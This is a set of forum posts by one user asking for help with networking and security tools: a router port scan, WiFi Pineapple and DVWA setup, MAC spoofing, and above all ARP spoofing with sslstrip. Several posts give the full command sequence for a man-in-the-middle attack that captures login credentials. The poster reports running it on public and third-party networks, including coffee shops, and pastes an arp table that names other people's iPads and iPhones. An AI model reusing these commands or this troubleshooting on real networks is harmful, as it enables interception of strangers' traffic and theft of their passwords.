michael_kent123

I recently ran nmap -sS -p1-65365 192.168.1.1 -vv on my Zyxel router. Here are the results: PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 7547/tcp open unknown The 7547 appears to be the CPE WAN Management Protocol (CWMP) which is this: http://www.axiros.com/knowledge-base/faqs-on-device-mgmt/cpe-wan-management-protocol-tr-069.html?no_cache=1 This does assume that 7547 isn't something else. The other ports are open because they are part of the remote management (I realise I can set these ports to something non-standard or close them on the router). However, I'm not entirely sure whether 7547 should be open (http://www.o2help.co.uk/router-close-port-7547/). Any thoughts? Thanks!

Thanks - this is what I was looking for. Possible stupid question: I will want to connect the RJ11 to a Russian 'phone socket. Will it work? Are all sockets the same? Is there a way to find out?

I plan to get a new laptop which may look something like this: http://www.pcworld.co.uk/gbuk/asus-x501u-xx039h-15-6-laptop-white-17056517-pdt.html It has an Ethernet port. Here is another example which does not have an Ethernet port: http://www.pcworld.co.uk/gbuk/asus-vivobook-s200e-c157h-11-6-touchscreen-laptop-dark-grey-18893012-pdt.html However, in both cases there is no modem (or modem port). I will need at some point to use a dial-up connection! Is there some device that will allow these type of laptops to connect to a 'phone socket (like in the old days). If so - what would it be called? Thanks!

Thanks - I found the correct cable! For some reason I misplaced it!

Three photos: power port of pineapple, USB to DC cable, and an assortment of cables and suchlike. Thanks!

Yes but the DC end cannot connect to the PWR port. This is the problem.

This may seem like a basic question but I am confused about how I can connect the Mark IV to the battery pack. The Mark IV has five connection points: USB (for external storage for modules), ANT (antenna), WAN / LAN, PoE LAN (for the Ethernet connection) and PWR (for the AC Adapter). The "Pineapple Juice" battery has two connection points: USB Out and USB In (for the charger cable). What I do not understand is how I am supposed to connect the two. The manual says I need to use the "USB to DC barrel cable" which I have. Where do I plug the USB end into? Where do I plug the DC end into? Thanks!

I am trying to set up Damn Vulnerable Web App (DVWA) (www.dvwa.co.uk). I install XAMPP according to these instructions successfully: http://www.apachefriends.org/en/xampp-linux.html I check that MSSQL is running under XAMPP: 21/tcp open ftp ProFTPD 1.3.4a 80/tcp open http Apache httpd 2.4.3 ((Unix) OpenSSL/1.0.1c PHP/5.4.7) 443/tcp open ssl/http Apache httpd 2.4.3 ((Unix) OpenSSL/1.0.1c PHP/5.4.7) 3306/tcp open mysql MySQL (unauthorized) I install DVWA according to these instructions: https://code.google.com/p/dvwa/wiki/README I go to localhost/dvwa and see: Unable to connect to the database. mysql_error() The /opt/lampp/htdocs/dvwa/config/config.inc.php file shows: $_DVWA[ 'db_server' ] = 'localhost'; $_DVWA[ 'db_database' ] = 'dvwa'; $_DVWA[ 'db_user' ] = 'root'; $_DVWA[ 'db_password' ] = ''; I am localhost (have also replaced this with 127.0.0.1 but it still did not work) and login as root. Yet I still get the above MYSQL error along with: Could not connect to the database - please check the config file. Does anyone know how I can fix this issue, thanks

bump...

I don't really understand this. I thought that if you changed the MAC then the router would assume you were a different client and award you a different IP? As for this file with IP and MAC - I've asked and the only one is /proc/net/arp. Is that what you mean? Finally, the WPA networks I am connecting to are legitimate e.g. in coffee shops and suchlike. So they are designed for people like me to connect. What I do not understand is that when I connect with my real MAC there is no problem but once I spoof the MAC I can never get a connection. Whereas, with open networks, I can always connect whether spoofed or not which suggests that - for whatever reasons - WPA networks do not like spoofed MAC addresses but I have no idea why. I always make sure the MAC is a valid OUI. Thanks again - any more ideas?

What do these Tor users do to attack your site? And could they not anonymise themselves through VPNs instead? VPNs are much quicker than Tor and also there are so many of them.

Hi, I have been playing around with MAC spoofing on my WPA-2 network. I am confused! Here are the commands I use to change my MAC (using Ubuntu 10.04). sudo ifconfig wlan0 down hw ether [new MAC address] sudo ifconfig wlan0 up I use valid OUI addresses from the oui.txt file from: http://standards.iee...oui/public.html However, I cannot connect to my router with a spoofed MAC and I have tried many different OUIs. Here is what dmesg shows: [20604.754981] wlan0: direct probe to AP 00:14:6c:12:66:c0 (try 1) [20604.759226] wlan0: direct probe responded [20604.759240] wlan0: authenticate with AP 00:14:6c:12:66:c0 (try 1) [20604.766951] wlan0: authenticated [20604.767007] wlan0: associate with AP 00:14:6c:12:66:c0 (try 1) [20604.770980] wlan0: RX AssocResp from 00:14:6c:12:66:c0 (capab=0x411 status=0 aid=1) [20604.770997] wlan0: associated [20612.392073] wlan0: deauthenticating from 00:14:6c:12:66:c0 by local choice (reason=3) I looked up what this meant in the "IEEE Standard for Information technology — Telecommunications and information exchange between systems — Local and metropolitan area networks — Specific requirements Part 11: Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications" manual specifically Table 7-22 "Reason Codes" (pages 92-93) Reason 3 is "Deauthenticated because sending STA is leaving (or has left) IBSS or ESS" What does "by local choice" for "reason=3" mean? The STA, I believe, is the client (me) but I am not mobile. Or, less often: [20496.710623] wlan0: deauthenticated from 00:14:6c:12:66:c0 (Reason: 15) Reason 15 is a "4-Way Handshake timeout". I connect in exactly the same way as I do when I connect normally (with a non-spoofed MAC). I have not setup any policies that restrict MAC addresses (there is no MAC filtering). When I re-spoof my MAC back to the 'real' MAC it immediately connects as normal. I have successfully spoofed my MAC and connected to numerous open wireless networks. I have also connected to a few WPA networks but have noticed that sometimes (not always) certain networks will either never allow a spoofed MAC to connect or sometimes will and sometimes will not. My router is a ZyXEL AMG1202-T10A but I don't think this matters because - as mentioned - I have successfully connected to many different networks (some with WPA) with different router types after MAC spoofing. I assume that the problem is something to do with WPA routers disliking - at times - spoofed MACs (but I do not know this). Question: while I appreciate it is impossible to give a definitive answer - why would my own router prevent me from connecting with a spoofed MAC? Thanks!

bump!

I think I may be able to explain the 'what' of the situation if not the 'why' It is based on the 'arp -a' command. I ARPspoof as follows: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan0 [iP address of router] sslstrip -l 10000 [to log POST requests] If I issue 'arp -a' and get something like this... ? (10.108.0.6) at 00:50:50:d7:60:24 [ether] on wlan0 ...then I know that no traffic is routed through me since the answer shows my connection to the router. However, if 'arp -a' provides something like this... ? (192.168.4.18) at 00:12:0b:32:1a:04 [ether] on wlan0 ? (192.168.4.32) at 00:12:0d:30:18:e4 [ether] on wlan0 ? (192.168.1.62) at 71:56:82:88:e8:f2 [ether] on wlan0 ? (192.168.4.11) at 00:12:0a:30:20:d1 [ether] on wlan0 ...then I know that ARPspoofing has been successful and I am the MITM. So, my question is: how do the owners of some networks prevent ARPspoofing commands from working? All of the networks where I failed to ARPspoof were 10.xxx.xxx.xxx networks. Yet I have been successful now and again on 10.xxx.xxx.xxx networks. All failures are 10.xxx.xxx.xxx networks but not all 10.xxx.xxx.xxx networks are failures. Any ideas how network owners can prevent ARPspoofing Thanks!

Thanks so much! New question: If I am the MITM and run arp -a in Ubuntu which reveals the results below then I think this signifies that all these participants are going through me. Correct? iPad-von-Resi.local (10.129.50.103) at b8:ff:61:0c:f1:29 [ether] on wlan0 Leonids-iPod.local (10.129.50.105) at <incomplete> on wlan0 ? (10.129.50.112) at <incomplete> on wlan0 Sams-iPad-2.local (10.129.50.121) at 34:51:c9:c0:b2:3b [ether] on wlan0 Becky-Turners-iPhone.local (10.129.50.100) at 5c:95:ae:6a:aa:d5 [ether] on wlan0 ? (10.129.50.97) at 44:d3:ca:91:2a:48 [ether] on wlan0 ? (10.129.50.106) at <incomplete> on wlan0 ? (10.129.50.102) at 8c:fa:ba:95:ba:ef [ether] on wlan0 ? (10.129.50.110) at c0:9f:42:79:7b:a3 [ether] on wlan0 ? (10.129.50.111) at 68:a3:c4:6a:f3:26 [ether] on wlan0 Two points: Why are some incomplete? I also suspect that iPads and iPhones act abnormally and - assuming their owners use 3G rather than wireless - this means that they are not really going through me. Does this sound OK? Thanks again!

On a related topic. What is the difference between 192.168.1.1 (which is the router address) and 192.168.1.255 (which is the broadcast address). For example, I have always used: arpspoof -i wlan0 192.168.1.1 However, at least one commentator on the Backtrack forum suggests that, to spoof the entire network, one should use the broadcast address. What would be the difference between arpspoffing these two IPs? Thanks.

I don't undertand the last two comments. The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim). The sslstrip.log file normally shows POST and SECURE POST logins and passwords. I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark. Or did I misunderstand what the last two posters were saying?

Some updates - and thanks for all the advice: I tried again on a network where it looks as if traffic (HTTP, SSL, etc) is flowing through me but nothing gets saved by SSL Strip. According to this article (http://torpedo48.it/hacking-tutorials/man-in-the-middle-attacks-mitm/how-to-sniff-all-network-traffic-using-https-stripping) you can view POST data (secure and not secure) in Wireshark. It says: "Login forms usually use the POST request method to send credentials to servers; using this filter you'll be able to find out all the credentials your victims inserted in the sites they visited (even the secured ones, thanks to Sslstrip!): "http.request.method == "POST""." The idea is, as I understand it, that SSL Strip will work on the MITM computer before the packets are saved by Wireshark. I tried the http.request,method == "POST" on a Wireshark file with 40,000 entries but found nothing. Interestingly, the sslstrip.log file did contain entries like this: 2012-10-02 14:22:55,593 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'loginsvc.world.com' not found: [Errno -5] No address associated with hostname. And: 012-10-02 14:22:28,068 Resolving host: www.whatever.org.uk 2012-10-02 14:22:28,069 Host not cached. This is all the log showed with the -a (all) option which normally would record a wide range of HTTP traffic. Perhaps these errors reveal something? Monitor mode: I used: sudo iwconfig wlan0 mode monitor However, I always got: Error for wireless request "Set Mode" (8B06) : SET failed on device wlan0 ; Device or resource busy. I'll try it next time with airmon-ng. I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.

I do not think I have explained myself well. The issue is nothing to do with Wireshark. I am only using Wireshark to see what traffic is going through me when I am MITM. sslstrip (http://www.thoughtcrime.org/software/sslstrip/) should log everything when I use its -a option. Often it works but - in the two experiences I provided in the original post - it will not log anything even though I am MITM.

I am trying to log all traffic not a specifc site. With arpspoof -i wlan0 [iP address of router] I should be the MITM for all traffic on the network which uses that router. I always use sudo wireshark but all traffic is saved with sslstrip and the -a option. I am using a physcial machine. The wireless adapter (wlan0) is Atheros Communications Inc. AR928X Wireless Network Adapter (PCI-Express) (rev 01). I have been successful on many occasions so I do not see how the issue is at my end. Thanks again!

I am having some interesting experiences while ARPspoofing and using SSLStrip. There's a couple of things I just cannot make sense of. I have watched the Hak 5 videos about this topic which is why I hope that this forum is an appropriate place to post. I'm not doing this for malicious purposes - I'm just curious that's all and have spent many hours trying to figure out my problem with zero success. Here's what I do. Connect to the network. su root echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan0 192.168.x.x [based on route -n] sslstrip -a -l 10000 [the -a options logs all traffic not just POST requests] This often works fine but sometimes there are problems. There are two issues (which may or may not be interconnected). First: I ARPspoof the network as described above. However, my Wireshark logs do not reveal that any HTTP, TCP, or TLS traffic is going through me. I obviously should be the MITM. I can see that I am telling everyone that I am the router with my ARP commands. But no content is going through me. I can observe lots of people nearby in the room doing various things that would generate traffic. And I am using the -a option so everything should be logged. But the log file stays at 0 bytes. Why is nothing going through me? I could understand if the network was empty but it isn't as within a few minutes the Wireshark file has tens of thousands of enteries. Second: This is more common than the above. The Wireshark logs do show DNS, HTTP, TCP, and TLS traffic but, once again, the log file stays at 0 bytes. I can see that, this time, traffic is flowing through me and I really do appear to be a MITM. But, in reality, no traffic is ever being recorded. The point is that I am forcing traffic through me so the ARP commands are effective. But nothing is saved. I have the Wireshark logs so if anyone has a specific question I can certainly refer to them. Many thanks - I am so confused about this and would really like to learn.